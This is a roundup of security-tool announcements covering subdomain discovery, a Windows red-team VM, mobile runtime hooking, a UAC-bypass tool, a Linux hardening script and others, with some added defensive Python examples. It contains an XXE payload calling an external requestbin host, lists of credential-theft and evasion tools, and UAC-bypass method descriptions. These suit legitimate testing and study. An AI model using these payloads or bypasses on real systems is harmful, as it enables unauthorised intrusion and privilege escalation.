
Findomain - A Cross-Platform Tool That Use Certificate Transparency Logs To Find Subdomains


A cross-platform tool that uses Certificate Transparency logs to find subdomains. Linux, Windows and macOS are currently supported.

How does it work?
The tool doesn't use the common (sub)domain discovery methods; instead it uses Certificate Transparency logs to find subdomains, which makes it much faster and more reliable. It queries multiple publicly available APIs to perform the search. If you want to know more about Certificate Transparency logs, read https://www.certificate-transparency.org/
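As an added illustration (not Findomain's own code) of what a CT-log search yields and how a defender reads it, the Python below parses a constructed, crt.sh-style JSON response, keeps only the names that are really under the target domain (stripping wildcards and rejecting look-alike substrings), and flags hosts missing from an asset inventory or certified by an issuer the organisation does not use. The record shape, issuer names and inventory are assumptions.

```python
import json

# Constructed sample in the shape of a crt.sh-style CT log search result:
# one object per logged certificate, "name_value" carrying the certificate's
# names separated by newlines. Sample data only, not a real log export.
SAMPLE_CT_RESPONSE = json.dumps([
    {"issuer_name": "CN=Public CA A",
     "name_value": "www.example.com\nexample.com",
     "not_before": "2019-06-01T00:00:00", "not_after": "2019-08-30T00:00:00"},
    {"issuer_name": "CN=Public CA B",
     "name_value": "*.dev.example.com\nstaging-api.example.com",
     "not_before": "2019-05-10T00:00:00", "not_after": "2020-05-10T00:00:00"},
    {"issuer_name": "CN=Corp Internal CA",
     "name_value": "MAIL.Example.COM.",
     "not_before": "2018-01-01T00:00:00", "not_after": "2021-01-01T00:00:00"},
    # Look-alike names that contain the target only as a substring.
    {"issuer_name": "CN=Public CA A",
     "name_value": "notexample.com\nexample.com.attacker.test",
     "not_before": "2019-06-01T00:00:00", "not_after": "2019-08-30T00:00:00"},
])


def normalise_name(name: str) -> str:
    """Lower-case a certificate name and drop a trailing dot and a leading
    wildcard label, so '*.Dev.Example.COM.' becomes 'dev.example.com'."""
    name = name.strip().lower().rstrip(".")
    return name[2:] if name.startswith("*.") else name


def in_scope(name: str, domain: str) -> bool:
    """True only for the apex itself or a name below it; substring matches
    such as 'notexample.com' or 'example.com.attacker.test' are rejected."""
    return name == domain or name.endswith("." + domain)


def subdomains_from_ct(ct_json: str, domain: str) -> dict:
    """Map every in-scope name found in the CT records to the set of issuer
    names that logged a certificate for it."""
    domain = normalise_name(domain)
    found = {}
    for record in json.loads(ct_json):
        for raw in record.get("name_value", "").split("\n"):
            name = normalise_name(raw)
            if name and in_scope(name, domain):
                found.setdefault(name, set()).add(record.get("issuer_name", "?"))
    return found


def review(found: dict, inventory: set, trusted_issuers: set) -> dict:
    """Defender's reading of the CT results: names that no asset inventory
    knows about (forgotten or shadow hosts) and names certified by an issuer
    the organisation does not use (possible mis-issuance)."""
    return {
        "unknown_hosts": sorted(n for n in found if n not in inventory),
        "unexpected_issuer": sorted(
            n for n, issuers in found.items() if not issuers <= trusted_issuers),
    }


if __name__ == "__main__":
    found = subdomains_from_ct(SAMPLE_CT_RESPONSE, "example.com")
    for name in sorted(found):
        print(f"{name:28} issued by {', '.join(sorted(found[name]))}")
    print(review(found,
                 inventory={"example.com", "www.example.com", "mail.example.com"},
                 trusted_issuers={"CN=Public CA A"}))
```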

Installation Linux
You can install it either by compiling the source manually or by using the precompiled binary.
Manually: you need to have Rust installed on your computer first.
$ git clone https://github.com/Edu4rdSHL/findomain.git
$ cd findomain
$ cargo build --release
$ sudo cp target/release/findomain /usr/bin/
$ findomain
Using the binary:
$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux
$ chmod +x findomain-linux
$ ./findomain-linux
If you are using the BlackArch Linux distribution, you just need to use:
$ sudo pacman -S findomain

Installation Windows
Download the binary from https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-windows.exe
Open a CMD shell and change to the directory where findomain-windows.exe was downloaded.
Run findomain-windows in the CMD shell.

Installation MacOS
$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-osx
$ chmod +x findomain-osx
$ ./findomain-osx

Usage
You can use the tool in two ways: discovering only the subdomain names, or discovering the subdomains together with their IP addresses.
findomain 0.1.4
Eduard Tolosa <tolosaeduard@gmail.com>
A tool that use Certificates Transparency logs to find subdomains.

USAGE:
findomain [FLAGS] [OPTIONS]

FLAGS:
-a, --all-apis Use all the available APIs to perform the search. It take more time but you will have a lot of more results.
-h, --help Prints help information
-i, --get-ip Return the subdomain list with IP address if resolved.
-V, --version Prints version information

OPTIONS:
-f, --file <file> Sets the input file to use.
-o, --output <output> Write data to output file in the specified format. [possible values: txt, csv, json]
-t, --target <target> Target host

Examples
  1. Make a simple search of subdomains and print the info on the screen:
findomain -t example.com
  2. Make a simple search of subdomains using all the APIs and print the info on the screen:
findomain -t example.com -a
  3. Make a search of subdomains and export the data to a CSV file:
findomain -t example.com -o csv
  4. Make a search of subdomains using all the APIs and export the data to a CSV file:
findomain -t example.com -a -o csv
  5. Make a search of subdomains and resolve the IP address of the subdomains (if possible):
findomain -t example.com -i
  6. Make a search of subdomains with all the APIs and resolve the IP address of the subdomains (if possible):
findomain -t example.com -i -a
  7. Make a search of subdomains with all the APIs and resolve the IP address of the subdomains (if possible), exporting the data to a CSV file:
findomain -t example.com -i -a -o csv

Features
  • Discover subdomains without brute force; the tool uses Certificate Transparency logs.
  • Discover subdomains with or without IP address according to user arguments.
  • Read target from user argument (-t).
  • Read a list of targets from file and discover their subdomains with or without IP and also write to output files per-domain if specified by the user, recursively.
  • Write output to TXT file.
  • Write output to CSV file.
  • Write output to JSON file.
  • Cross platform support: Linux, Windows, MacOS.
  • Optional multiple API support.

Issues and requests
If you have a problem or a feature request, open an issue.



Commando VM v1.3 - The First Full Windows-based Penetration Testing Virtual Machine Distribution


Welcome to CommandoVM - a fully customized, Windows-based security distribution for penetration testing and red teaming.

Installation (Install Script)

Requirements
  • Windows 7 Service Pack 1 or Windows 10
  • 60 GB Hard Drive
  • 2 GB RAM

Recommended
  • Windows 10
  • 80+ GB Hard Drive
  • 4+ GB RAM
  • 2 network adapters
  • Enable Virtualization support for VM

Instructions
  1. Create and configure a new Windows Virtual Machine
  • Ensure VM is updated completely. You may have to check for updates, reboot, and check again until no more remain
  • Take a snapshot of your machine!
  • Download and copy install.ps1 on your newly configured machine.
  • Open PowerShell as an Administrator
  • Enable script execution by running the following command:
    • Set-ExecutionPolicy Unrestricted
  • Finally, execute the installer script as follows:
    • .\install.ps1
    • You can also pass your password as an argument: .\install.ps1 -password <password>
The script will set up the Boxstarter environment and proceed to download and install the Commando VM environment. You will be prompted for the administrator password in order to automate host restarts during installation. If you do not have a password set, hitting enter when prompted will also work.

Installing a new package
Commando VM uses the Chocolatey Windows package manager. It is easy to install a new package. For example, enter the following command as Administrator to deploy Github Desktop on your system:
cinst github

Staying up to date
Type the following command to update all of the packages to the most recent version:
cup all

Installed Tools

Active Directory Tools
  • Remote Server Administration Tools (RSAT)
  • SQL Server Command Line Utilities
  • Sysinternals

Command & Control
  • Covenant
  • PoshC2
  • WMImplant
  • WMIOps

Developer Tools
  • Dep
  • Git
  • Go
  • Java
  • Python 2
  • Python 3 (default)
  • Ruby
  • Ruby Devkit
  • Visual Studio 2017 Build Tools (Windows 10)
  • Visual Studio Code

Evasion
  • CheckPlease
  • Demiguise
  • DefenderCheck
  • DotNetToJScript
  • Invoke-CradleCrafter
  • Invoke-DOSfuscation
  • Invoke-Obfuscation
  • Invoke-Phant0m
  • Not PowerShell (nps)
  • PS>Attack
  • PSAmsi
  • Pafishmacro
  • PowerLessShell
  • PowerShdll
  • StarFighters

Exploitation
  • ADAPE-Script
  • API Monitor
  • CrackMapExec
  • CrackMapExecWin
  • DAMP
  • EvilClippy
  • Exchange-AD-Privesc
  • FuzzySec's PowerShell-Suite
  • FuzzySec's Sharp-Suite
  • Generate-Macro
  • GhostPack
    • Rubeus
    • SafetyKatz
    • Seatbelt
    • SharpDPAPI
    • SharpDump
    • SharpRoast
    • SharpUp
    • SharpWMI
  • GoFetch
  • Impacket
  • Invoke-ACLPwn
  • Invoke-DCOM
  • Invoke-PSImage
  • Invoke-PowerThIEf
  • Juicy Potato
  • Kali Binaries for Windows
  • LuckyStrike
  • MetaTwin
  • Metasploit
  • Mr. Unikod3r's RedTeamPowershellScripts
  • NetshHelperBeacon
  • Nishang
  • Orca
  • PSReflect
  • PowerLurk
  • PowerPriv
  • PowerSploit
  • PowerUpSQL
  • PrivExchange
  • RottenPotatoNG
  • Ruler
  • SharpClipHistory
  • SharpExchangePriv
  • SharpExec
  • SpoolSample
  • SharpSploit
  • UACME
  • impacket-examples-windows
  • vssown
  • Vulcan

Information Gathering
  • ADACLScanner
  • ADExplorer
  • ADOffline
  • ADRecon
  • BloodHound
  • dnsrecon
  • FOCA
  • Get-ReconInfo
  • GoBuster
  • GoWitness
  • NetRipper
  • Nmap
  • PowerView
    • Dev branch included
  • SharpHound
  • SharpView
  • SpoolerScanner
  • Watson

Networking Tools
  • Citrix Receiver
  • OpenVPN
  • Proxycap
  • PuTTY
  • Telnet
  • VMWare Horizon Client
  • VMWare vSphere Client
  • VNC-Viewer
  • WinSCP
  • Windump
  • Wireshark

Password Attacks
  • ASREPRoast
  • CredNinja
  • DomainPasswordSpray
  • DSInternals
  • Get-LAPSPasswords
  • Hashcat
  • Internal-Monologue
  • Inveigh
  • Invoke-TheHash
  • KeeFarce
  • KeeThief
  • LAPSToolkit
  • MailSniper
  • Mimikatz
  • Mimikittenz
  • RiskySPN
  • SessionGopher

Reverse Engineering
  • DNSpy
  • Flare-Floss
  • ILSpy
  • PEview
  • Windbg
  • x64dbg

Utilities
  • 7zip
  • Adobe Reader
  • AutoIT
  • Cmder
  • CyberChef
  • Explorer Suite
  • Gimp
  • Greenshot
  • Hashcheck
  • Hexchat
  • HxD
  • Keepass
  • MobaXterm
  • Mozilla Thunderbird
  • Neo4j Community Edition
  • Notepad++
  • Pidgin
  • Process Hacker 2
  • SQLite DB Browser
  • Screentogif
  • Shellcode Launcher
  • Sublime Text 3
  • TortoiseSVN
  • VLC Media Player
  • Winrar
  • yEd Graph Tool

Vulnerability Analysis
  • AD Control Paths
  • Egress-Assess
  • Grouper2
  • NtdsAudit
  • PwndPasswordsNTLM
  • zBang

Web Applications
  • Burp Suite
  • Fiddler
  • Firefox
  • OWASP Zap
  • Subdomain-Bruteforce
  • Wfuzz

Wordlists
  • FuzzDB
  • PayloadsAllTheThings
  • SecLists
  • Probable-Wordlists
  • RobotsDisallowed

Changelog:
1.3 - June 28 2019
1.2 - May 31 2019
1.1 - April 30 2019
1.0.2 - April 10 2019
  • Added missing 'seclists.fireeye' package to packages.json #38
1.0.1 - March 31 2019
  • Used https instead of http to install boxstarter #10


Objection v1.6.6 - Runtime Mobile Exploration


objection is a runtime mobile exploration toolkit, powered by Frida. It was built with the aim of helping assess mobile applications and their security posture without the need for a jailbroken or rooted mobile device.
Note: This is not some form of jailbreak / root bypass. By using objection, you are still limited by all of the restrictions imposed by the applicable sandbox you are facing.

features
objection supports both iOS and Android, and new features and improvements are added regularly as the tool is used in real-world scenarios. The following is a short list of only a few key features:
For all supported platforms, objection allows you to:
  • Patch iOS and Android applications, embedding a Frida gadget that can be used with objection or just Frida itself.
  • Interact with the filesystem, listing entries as well as upload & download files where permitted.
  • Perform various memory related tasks, such as listing loaded modules and their respective exports.
  • Attempt to bypass and simulate jailbroken or rooted environments.
  • Discover loaded classes and list their respective methods.
  • Perform common SSL pinning bypasses.
  • Dynamically dump arguments from methods called as you use the target application.
  • Interact with SQLite databases inline without the need to download the targeted database and use an external tool.
  • Execute custom Frida scripts.
iOS specific features in objection include the ability to:
  • Dump the iOS keychain, and export it to a file.
  • Dump data from common storage such as NSUserDefaults and the shared NSHTTPCookieStorage.
  • Dump various formats of information in human readable forms.
  • Bypass certain forms of TouchID restrictions.
  • Watch for method executions by targeting all methods in a class, or just a single method.
  • Monitor the iOS pasteboard.
  • Dump encoded .plist files in a human readable format without relying on external parsers.
Android specific features in objection include the ability to:
  • List the application's Activities, Services and Broadcast receivers.
  • Start arbitrary Activities available in the target application.
  • Watch a class method, reporting execution as it happens.

screenshots
The following screenshots show the main objection REPL, connected to a test application on both an iPad running iOS 10.2.1 and a Samsung Galaxy S5 running Android 6.

  • A file system listing of the iOS application's main bundle
  • A file system listing of the Android application's bundle
  • iOS keychain dumped for the current application, and later written to a file called keychain.json
  • Inline SQLite query tool
  • SSL pinning bypass running for an iOS application
  • SSL pinning bypass running for an Android application
  • API usage to list the currently stored iOS sharedHTTPCookieStorage


sample usage
A sample session, where objection version 0.1 is used to explore the application's environment. Newer versions set the REPL prompt to the current application's name; usage, however, has remained the same:


prerequisites
To run objection, all you need is the python3 interpreter to be available. Installation via pip should take care of all of the dependencies needed. For more details, please see the prerequisites section on the project wiki.
As for the target mobile applications though, for iOS, an unencrypted IPA is needed and Android just the normal APK should be fine. If you have the source code of the iOS application you want to explore, then you can simply embed and load the FridaGadget.dylib from within the Xcode project.

installation
Installation is simply a matter of pip3 install objection. This will give you the objection command.
For more detailed update and installation instructions, please refer to the wiki page here.


Ghostfuscator - The Python Password-Protected Obfuscator Using AES Encryption


Obfuscates Python scripts, making them password-protected using AES encryption.

Usage
Just execute the script, and follow the menu.

Info
Once a script is obfuscated, a password prompt appears when it is run; after the correct password is submitted, the script is decrypted in memory and executed.


Dwarf - Full Featured Multi Arch/Os Debugger Built On Top Of PyQt5 And Frida


A debugger for reverse engineers, crackers and security analysts. Or you can call it damn, why are raspberries so fluffy or yet, duck warriors are rich as fuck. Whatever you like! Built on top of PyQt5, Frida and some terrible code.

Check out the website for features, API and examples
CHANGELOG

Something you can do with Dwarf
  • breakpoints
  • watchpoints without hardware support
  • visual emulation with auto map from target, reporting memory accesses
  • breaks module loading cycle, java classes
  • set break conditions and custom logic
  • inject code on each breakpointed thread
  • exchange data with your target and display it in UI
  • digging through memory, disassembly and jvm fields/functions
  • backtrace both native and java
  • loads your whole Frida agent in the script editor, converts hooks to breakpoints, etc.
  • more...
  • all of this can be done through scripting to build custom debugging logic

Prerequisites
A frida server running anywhere.

Android Session:
  • make sure you can use the 'adb' command in your console, or read here
  • root on the device/emulator is required!
  • make sure frida-server is in /system/bin or /system/xbin with a+x permissions, or let Dwarf automatically install the latest frida server

Setup and run
git clone https://github.com/iGio90/Dwarf

cd Dwarf

pip3 install -r requirements.txt

python3 dwarf.py

Optionally
You can install keystone-engine to enable assembler:
Windows
x86: https://github.com/keystone-engine/keystone/releases/download/0.9.1/keystone-0.9.1-python-win32.msi
x64: https://github.com/keystone-engine/keystone/releases/download/0.9.1/keystone-0.9.1-python-win64.msi

OSX / Unix
pip3 install keystone-engine
dex2jar tools (required for baksmali/decompiling)
Guide: https://sourceforge.net/p/dex2jar/wiki/UserGuide/
Files: https://github.com/pxb1988/dex2jar/releases

On Windows add d2j folder to %PATH% and change:
'java -Xms512m -Xmx1024m -cp "%CP%" %*'
in d2j_invoke.bat to
'java -Xms512m -Xmx4096m -cp "%CP%" %*'

Settings
You can change the following settings in .dwarf:
"dwarf_ui_hexedit_bpl": 32 (default: 16) - Bytes per line in hexview
"dwarf_ui_hexstyle": "upper", "lower" (default: "upper") - overall hexstyle 0xabcdef or 0xABCDEF (note: click on the "Offset (X)" in hexview to change)
"dwarf_ui_font_size": 12 (default: 12) - (note: hexview/disasm use other font wait for settingsdlg or change lib/utils.py get_os_monospace_font())


Pown-Duct - Essential Tool For Finding Blind Injection Attacks


Essential tool for finding blind injection attacks using DNS side-channels.

Credits
This tool is part of secapps.com open-source initiative.
  ___ ___ ___   _   ___ ___  ___
/ __| __/ __| /_\ | _ \ _ \/ __|
\__ \ _| (__ / _ \| _/ _/\__ \
|___/___\___/_/ \_\_| |_| |___/
https://secapps.com
NB: This tool uses the http://requestbin.net service. Future versions will use a dedicated, custom-built infrastructure.

Quickstart
This tool is meant to be used as part of Pown.js but it can be invoked separately as an independent tool.
Install Pown first as usual:
$ npm install -g pown@latest
Invoke directly from Pown:
$ pown duct
Otherwise, install this module locally from the root of your project:
$ npm install @pown/duct --save
Once done, invoke pown cli:
$ ./node_modules/.bin/pown-cli duct
You can also use the global pown to invoke the tool locally:
$ POWN_ROOT=. pown duct

Usage
pown duct <command>

Side-channel attack enabler

Commands:
pown duct dns DNS ducting

Options:
--version Show version number [boolean]
--help Show help [boolean]

pown duct dns
pown duct dns

DNS ducting

Options:
--version Show version number [boolean]
--help Show help [boolean]
--channel Restore channel [string]
--output Output format [string] [choices: "string", "hexdump", "json"] [default: "string"]

Tutorial
There are cases when we need to perform an attack such as SQL injection, XSS, XXE or SSRF, but the target application does not give any indication that it is vulnerable. One way to confirm that a vulnerability is present is to inject a valid attack vector that forces a DNS resolver to look up a domain under our control. If the resolution happens, the attack is considered successful.
NOTE: You might be familiar with Burp Collaborator which provides a similar service for customers.
First, we need a disposable dns name to resolve:
$ pown duct dns


Using the provided DNS name, compose your payload. For example, the following could trigger a DNS resolution if an XXE vulnerability is present.
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">
]>
<foo>
&bar;
</foo>
If the attack was successful, we will get a message in the terminal.
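To show the defender's side of the tutorial, here is an added Python example (not part of Pown.js) that feeds the XXE document above to the standard-library SAX parser twice: once with external general entities enabled, where the parser attempts to fetch the canary URL, and once with them disabled, where no lookup is attempted. The canary hostname is a constructed placeholder for the disposable requestbin name, and a recording entity resolver stands in for the network.

```python
import io
import xml.sax
from xml.sax import handler
from xml.sax.xmlreader import InputSource

# Constructed canary hostname standing in for the disposable requestbin name
# that "pown duct dns" hands out; the .invalid TLD never resolves.
CANARY_URL = "http://showmethemoney.canary.example.invalid"

# The XXE document from the tutorial above, pointed at the constructed canary.
XXE_DOC = f"""<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "{CANARY_URL}">
]>
<foo>
&bar;
</foo>"""


class RecordingResolver(handler.EntityResolver):
    """Records every external entity the parser tries to fetch and serves an
    empty body in its place, so the demonstration never touches the network.
    In production this is exactly the call that leaks to the attacker's DNS."""

    def __init__(self):
        self.fetch_attempts = []

    def resolveEntity(self, publicId, systemId):
        self.fetch_attempts.append(systemId)
        source = InputSource(systemId)
        source.setCharacterStream(io.StringIO(""))
        return source


def parse_and_record(doc: str, allow_external_entities: bool) -> list:
    """Parse doc with the stdlib SAX (expat) parser and return the external
    entity URLs it attempted to fetch. allow_external_entities=True is the
    unsafe configuration the tutorial's payload relies on; False is the
    hardened configuration a defender should ship."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, allow_external_entities)
    resolver = RecordingResolver()
    parser.setEntityResolver(resolver)
    parser.setContentHandler(handler.ContentHandler())
    parser.parse(io.StringIO(doc))
    return resolver.fetch_attempts


if __name__ == "__main__":
    print("unsafe parser fetched:  ", parse_and_record(XXE_DOC, True))
    print("hardened parser fetched:", parse_and_record(XXE_DOC, False))
```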



PasteHunter - Scanning Pastebin With Yara Rules


PasteHunter is a python3 application designed to query a collection of sites that host publicly pasted data. For all the pastes it finds, it scans the raw contents against a series of Yara rules, looking for information that can be used by an organisation or a researcher.
For setup instructions please see the official documentation https://pastehunter.readthedocs.io/en/latest/installation.html

Supported Inputs
Pastehunter currently has support for the following sites:
  • pastebin.com
  • gist.github.com
  • slexy.org
  • stackexchange (there are about 176 sites!)

Supported Outputs
Pastehunter supports several output modules:
  • dump to ElasticSearch DB (default).
  • Email alerts (SMTP).
  • Slack Channel notifications.
  • Dump to JSON file.
  • Dump to CSV file.
  • Send to syslog.
For examples of data discovered using pastehunter check out my posts https://techanarchy.net/blog/hunting-pastebin-with-pastehunter and https://techanarchy.net/blog/pastehunter-the-results


Passpie - Multiplatform Command-Line Password Manager


Passpie is a command line tool to manage passwords from the terminal with a colorful and configurable interface. Use a master passphrase to decrypt login credentials, copy passwords to the clipboard, synchronize with a git repository, check the state of your passwords, and more.
Password files are encrypted using GnuPG and saved into yaml text files. Passpie supports Linux, OSX and Windows.

What does it look like? Here is an example of a simple Passpie usage:
passpie init
passpie add foo@example.com --random
passpie add bar@example.com --pattern "[0-9]{5}[a-z]{5}"
passpie update foo@example --comment "Hello"
passpie
passpie copy foo@example.com
Outputs:
===========  =======  ==========  =========
Name         Login    Password    Comment
===========  =======  ==========  =========
example.com  bar      ********
example.com  foo      ********    Hello
===========  =======  ==========  =========
Password copied to clipboard
Check example remote passpie database: https://github.com/marcwebbie/passpiedb.

Install
pip install passpie
Or if you are on a mac, install via Homebrew:
brew install passpie

Dependencies
Passpie depends on GnuPG for encryption

Commands
Usage: passpie [OPTIONS] COMMAND [ARGS]...

Options:
-D, --database TEXT Database path or url to remote repository
--autopull TEXT Autopull changes from remote pository
--autopush TEXT Autopush changes to remote pository
--config PATH Path to configuration file
-v, --verbose Activate verbose output
--version Show the version and exit.
--help Show this message and exit.

Commands:
add Add new credential to database
complete Generate completion scripts for shells
config Show current configuration for shell
copy Copy credential password to clipboard/stdout
export Export credentials in plain text
import Import credentials from path
init Initialize new passpie database
list Print credential as a table
log Shows passpie database changes history
purge Remove all credentials from database
remove Remove credential
reset Renew passpie database and re-encrypt...
search Search credentials by regular expressions
status Diagnose database for improvements
update Update credential


Learn more




Project iKy v2.0.0 - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface


Project iKy is a tool that collects information from an email and shows results in a nice visual interface.

Visit the Gitlab Page of the Project

Project

First of all, we want to advise you that we have changed the frontend from AngularJS to Angular 7. For this reason we have kept the project with the AngularJS frontend in the iKy-v1 branch, together with the documentation for its installation here.
The reason for changing the frontend was to update the technology and make installation easier.

Video


Installation

Clone repository

git clone https://gitlab.com/kennbroorg/iKy.git

Install Backend


Redis
You must install Redis
wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
sudo make install
And turn on the server in a terminal
redis-server

Python stuff and Celery
You must install the libraries inside requirements.txt
pip install -r requirements.txt
Then start Celery in another terminal, from the backend directory
./celery.sh
Finally, in yet another terminal, start the backend app from the backend directory
python app.py

Install Frontend


Node
First of all, install nodejs.

Dependencies
Inside the frontend directory, install the dependencies
npm install

Turn on Frontend Server
Finally, to run frontend server, execute:
npm start

Browser

Open the browser at this URL

Config API Keys

Once the application is loaded in the browser, you should go to the Api Keys option and load the values of the APIs that are needed.

  • Fullcontact: Generate the API keys here
  • Twitter: Generate the API keys here
  • Linkedin: Only the user and password of your account must be loaded

Change from latest version

  • Add more analysis on twitter
  • Reactive Have I Been Pwned (BLOCK, NOLEAK, LEAK)
  • Change the main cover
  • Change the secondary cover
  • Add Modules Implemented to main cover
  • Add Contributors to main cover
  • Add Projects to main cover
  • Add People to main cover
  • Add Friends to main cover
  • Change visual windows, sidepanel, footer and shadows
  • Change validation indicators
  • Change validation filters



JShielder v2.4 - Hardening Script For Linux Servers/ Secure LAMP-LEMP Deployer/ CIS Benchmark G




JShielder is an open source Bash script developed to help sysadmins and developers secure the Linux servers on which they will be deploying web applications or services. This tool automates the process of installing all the packages necessary to host a web application and of hardening a Linux server, with little interaction from the user. A newly added script follows CIS Benchmark guidance to establish a secure configuration posture for Linux systems.

This tool is a Bash Script that hardens the Linux Server security automatically and the steps followed are:
  • Configures a Hostname
  • Reconfigures the Timezone
  • Updates the entire System
  • Creates a new admin user so you can manage your server safely without the need for remote connections as root.
  • Helps the user generate secure RSA keys, so that remote access to your server is done exclusively from your local PC and not with a conventional password
  • Configures, Optimize and secures the SSH Server (Some Settings Following CIS Benchmark)
  • Configures IPTABLES Rules to protect the server from common attacks
  • Disables unused FileSystems and Network protocols
  • Protects the server against brute force attacks by installing and configuring fail2ban
  • Installs and Configure Artillery as a Honeypot, Monitoring, Blocking and Alerting tool
  • Installs PortSentry
  • Install, configure, and optimize MySQL
  • Install the Apache Web Server
  • Install, configure and secure PHP
  • Secure Apache via configuration file and with installation of the Modules ModSecurity, ModEvasive, Qos and SpamHaus
  • Secures NginX with the Installation of ModSecurity NginX module
  • Installs RootKit Hunter
  • Secures Root Home and Grub Configuration Files
  • Installs Unhide to help Detect Malicious Hidden Processes
  • Installs Tiger, A Security Auditing and Intrusion Prevention system
  • Restrict Access to Apache Config Files
  • Disables Compilers
  • Creates Daily Cron job for System Updates
  • Kernel Hardening via sysctl configuration File (Tweaked)
  • /tmp Directory Hardening
  • PSAD IDS installation
  • Enables Process Accounting
  • Enables Unattended Upgrades
  • MOTD and Banners for Unauthorized access
  • Disables USB Support for Improved Security (Optional)
  • Configures a Restrictive Default UMASK
  • Configures and enables Auditd
  • Configures Auditd rules following CIS Benchmark
  • Sysstat install
  • ArpWatch install
  • Additional Hardening steps following CIS Benchmark
  • Secures Cron
  • Automates the process of setting a GRUB Bootloader Password
  • Secures Boot Settings
  • Sets Secure File Permissions for Critical System Files
#NEW!!
  • LEMP Deployment with ModSecurity
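As an added example (not JShielder's own code) of what "securing the SSH server following CIS Benchmark" means in practice, this Python audit parses a constructed sshd_config the way sshd does (the first value of a keyword wins, and settings after a Match line are not global) and reports each CIS-recommended value that is missing or weak. The sample config and the expectation table are assumptions drawn from the CIS Ubuntu benchmark's SSH section.

```python
import re

# Constructed sshd_config excerpt in the style of a stock Ubuntu file, with a
# few deliberately weak settings. Sample only, not JShielder's own output.
SAMPLE_SSHD_CONFIG = """\
# Package generated configuration file
Port 22
Protocol 2
LogLevel INFO
PermitRootLogin yes
MaxAuthTries 6
X11Forwarding yes
IgnoreRhosts yes
HostbasedAuthentication no
PermitEmptyPasswords no
ClientAliveInterval 0
ClientAliveCountMax 3
# sshd keeps the first value of a keyword, so this later line changes nothing
PermitRootLogin no
Match User backup
    PasswordAuthentication yes
    X11Forwarding no
"""


def equals(*accepted):
    return lambda v: v.lower() in accepted


def at_most(limit):
    return lambda v: v.isdigit() and int(v) <= limit


def between(low, high):
    return lambda v: v.isdigit() and low <= int(v) <= high


# Global sshd_config values recommended in the CIS Ubuntu Linux benchmark's
# SSH section (keywords lower-cased, as sshd treats them case-insensitively).
CIS_EXPECTATIONS = {
    "protocol": equals("2"),
    "loglevel": equals("info", "verbose"),
    "x11forwarding": equals("no"),
    "maxauthtries": at_most(4),
    "ignorerhosts": equals("yes"),
    "hostbasedauthentication": equals("no"),
    "permitrootlogin": equals("no"),
    "permitemptypasswords": equals("no"),
    "permituserenvironment": equals("no"),
    "clientaliveinterval": between(1, 300),
    "clientalivecountmax": at_most(3),
    "logingracetime": between(1, 60),
}

# "Keyword value" or "Keyword=value"; comment lines never match.
_LINE = re.compile(r"^([A-Za-z0-9]+)[ \t=]+(.+)$")


def parse_global_settings(text: str) -> dict:
    """Effective global keyword -> value map, following sshd's own rules:
    keywords are case-insensitive, the first occurrence of a keyword wins,
    and everything after a Match line is conditional, hence not global."""
    settings = {}
    for line in text.splitlines():
        match = _LINE.match(line.strip())
        if not match:
            continue
        key, value = match.group(1).lower(), match.group(2).strip()
        if key == "match":
            break
        settings.setdefault(key, value)
    return settings


def audit(text: str) -> list:
    """Return (keyword, effective value, reason) for every CIS expectation the
    global configuration fails. An absent keyword is reported too, because
    sshd then falls back to its compiled-in default."""
    settings = parse_global_settings(text)
    findings = []
    for key, acceptable in CIS_EXPECTATIONS.items():
        value = settings.get(key)
        if value is None:
            findings.append((key, None, "not set; sshd default applies"))
        elif not acceptable(value):
            findings.append((key, value, "outside CIS recommendation"))
    return findings


if __name__ == "__main__":
    for key, value, reason in audit(SAMPLE_SSHD_CONFIG):
        print(f"{key:24} {str(value):6} {reason}")
```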

CIS Benchmark JShielder Script Added

To Run the tool
./jshielder.sh
As the Root user

Issues
Having Problems, please open a New Issue for JShielder on Github.

Distro Availability
  • Ubuntu Server 16.04LTS
  • Ubuntu Server 18.04LTS

ChangeLog
v2.4 Added LEMP Deployment with ModSecurity
v2.3 More Hardening steps Following some CIS Benchmark items for LAMP Deployer
v2.2.1 Removed Suhosin installation on Ubuntu 16.04, fixed MySQL configuration and the GRUB bootloader setup function; the server IP is now obtained via ip route so as not to rely on interface naming
v2.2 Added new Hardening option following CIS Benchmark Guidance
v2.1 Hardened SSH Configuration, Tweaked Kernel Security Config, Fixed iptables rules not loading on Boot. Added auditd, sysstat, arpwatch install.
v2.0 More Deployment Options, Selection Menu, PHP Suhosin installation, Cleaner Code,
v1.0 - New Code
Developed by Jason Soto
https://www.jasonsoto.com
https://github.com/jsitech
Twitter = @JsiTech


UACME - Defeating Windows User Account Control


Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.

System Requirements
  • x86-32/x64 Windows 7/8/8.1/10 (client; some methods, however, also work on server versions).
  • Admin account with UAC set on default settings required.

Usage
Run executable from command line: akagi32 [Key] [Param] or akagi64 [Key] [Param]. See "Run examples" below for more info.
First param is number of method to use, second is optional command (executable file name including full path) to run. Second param can be empty - in this case program will execute elevated cmd.exe from system32 folder.
Keys (watch debug output with dbgview or similar for more info):
  1. Author: Leo Davidson
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system32\sysprep\sysprep.exe
    • Component(s): cryptbase.dll
    • Implementation: ucmStandardAutoElevation
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 8.1 (9600)
      • How: sysprep.exe hardened LoadFrom manifest elements
  2. Author: Leo Davidson derivative
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system32\sysprep\sysprep.exe
    • Component(s): ShCore.dll
    • Implementation: ucmStandardAutoElevation
    • Works from: Windows 8.1 (9600)
    • Fixed in: Windows 10 TP (> 9600)
      • How: Side effect of ShCore.dll moving to \KnownDlls
  3. Author: Leo Davidson derivative by WinNT/Pitou
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system32\oobe\setupsqm.exe
    • Component(s): WdsCore.dll
    • Implementation: ucmStandardAutoElevation
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 TH2 (10558)
      • How: Side effect of OOBE redesign
